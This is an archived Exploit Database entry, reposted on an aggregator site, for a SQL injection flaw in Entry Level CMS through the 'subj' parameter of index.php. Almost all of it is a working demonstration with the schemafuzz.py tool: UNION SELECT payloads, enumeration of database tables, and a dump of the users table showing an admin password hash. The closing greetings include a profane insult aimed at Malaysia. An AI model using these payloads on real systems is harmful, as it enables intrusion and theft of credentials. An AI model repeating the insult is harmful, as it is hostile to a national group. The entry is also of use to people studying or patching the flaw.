Entry Level Content Management System (EL CMS) – SQL Injection

• Exploit Database
• 9 阅读

• 作者： vir0e5
  日期： 2010-05-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12667/

• [+] Contact	: vir0e5[at]hackermail[dot]com
  [+] Group	: TECON (The Eye COnference) Indonesia
  [+] Site	: http://tecon-crew.org
  ********************************************
  
   [Software Information ]
  [+]SOftware: Entry Level Content Management System (EL CMS)
  [+]vendor: http://www.entrylevelcms.com/
  [+]Vulnerability : SQL Injection
  ********************************************
  
  [ Vulnerable File ]
  http://localhost/website/index.php?subj=4
  
  [demo with schemafuzz.py]
  |---------------------------------------------------------------
  | rsauron[at]gmail[dot]com v5.0 
  | 6/2008schemafuzz.py 
  |-MySQL v5+ Information_schema Database Enumeration 
  |-MySQL v4+ Data Extractor
  |-MySQL v4+ Table & Column Fuzzer 
  | Usage: schemafuzz.py [options]
  |-h helpdarkc0de.com
  |------------------------------------------------------------
  
  C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol
  
  |------------------------------------------------------------
  | rsauron[at]gmail[dot]com v5.0 
  | 6/2008schemafuzz.py 
  |-MySQL v5+ Information_schema Database Enumeration
  |-MySQL v4+ Data Extractor
  |-MySQL v4+ Table & Column Fuzzer 
  | Usage: schemafuzz.py [options]
  |-h helpdarkc0de.com
  |------------------------------------------------------------
  
  [+] URL:http://localhost/website/index.php?subj=6--
  [+] Evasion Used: "+" "--"
  [+] 03:36:40
  [-] Proxy Not Given
  [+] Attempting To find the number of columns...
  [+] Testing: 0,1,2,3,
  [+] Column Length is: 4
  [+] Found null column at column #: 0
  [+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
  [+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
  [-] Done!
  
  C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full
  
  |------------------------------------------------------------
  | rsauron[at]gmail[dot]com v5.0 
  | 6/2008schemafuzz.py 
  |-MySQL v5+ Information_schema Database Enumeration 
  |-MySQL v4+ Data Extractor
  |-MySQL v4+ Table & Column Fuzzer
  | Usage: schemafuzz.py [options]
  |-h helpdarkc0de.com
  |------------------------------------------------------------
  
  [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
  [+] Evasion Used: "+" "--"
  [+] 05:33:34
  [+] Proxy Not Given
  [+] Gathering MySQL Server Configuration...
  	Database: vman
  	User: root@localhost
  	Version: 5.0.51a
  
  [Database]: elcms_db
  [Table: Columns]
  [0]pages: id,subject_id,menu_name,position,visible,content
  [1]subjects: id,menu_name,position,visible
  [2]users: id,username,hashed_password
  
  [-] [05:55:27]
  [-] Total URL Requests 17
  [-] Done
  
  
  C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password
  
  |------------------------------------------------------------
  | rsauron[at]gmail[dot]com v5.0 
  | 6/2008schemafuzz.py 
  |-MySQL v5+ Information_schema Database Enumeration 
  |-MySQL v4+ Data Extractor
  |-MySQL v4+ Table & Column Fuzzer 
  | Usage: schemafuzz.py [options]
  |-h helpdarkc0de.com
  |------------------------------------------------------------
  
  [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
  [+] Evasion Used: "+" "--"
  [+] 05:35:14
  [+] Proxy Not Given
  [+] Gathering MySQL Server Configuration...
  	Database: vman
  	User: root@localhost
  	Version: 5.0.51a
  [+] Dumping data from database "vman" Table "users"
  [+] Column(s) ['id', 'username', 'hashed_password']
  [+] Number of Rows: 1
  
  [0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:
  
  [-] [05:35:15]
  [-] Total URL Requests 3
  [-] Done
  
  
  
  
  
  If you not understand about it 
  [Option/help this tools]
   schemafuzz.py -h
  
  ********************************************
  -- Thank's to my GOD and Soldier Of Allah 
  
  -- Special Thanks
  #http://indonesian-cyber.org (as Member)
  #http://indonesianhacker.org(as Member)
  #http://devilzc0de.org (as Member)
  #http://tecon-crew.org(as Member)
  #http://u3dcrew.darkbb.com(as Member)
  
   --No Special for me, i'm newbie!! ^^--
  
  kaMtiEz, r3m1ck, mywisdom, kiddies, dewancc, m0z4rtkl1k, bluescreen, xyberdesktop, n0rma4n_gokil, 12i4n, BZ AND YOU!!!
  
  
  Notice : "boycott malaysian product "
  * Fuck to Malaysia <= the truly thief asia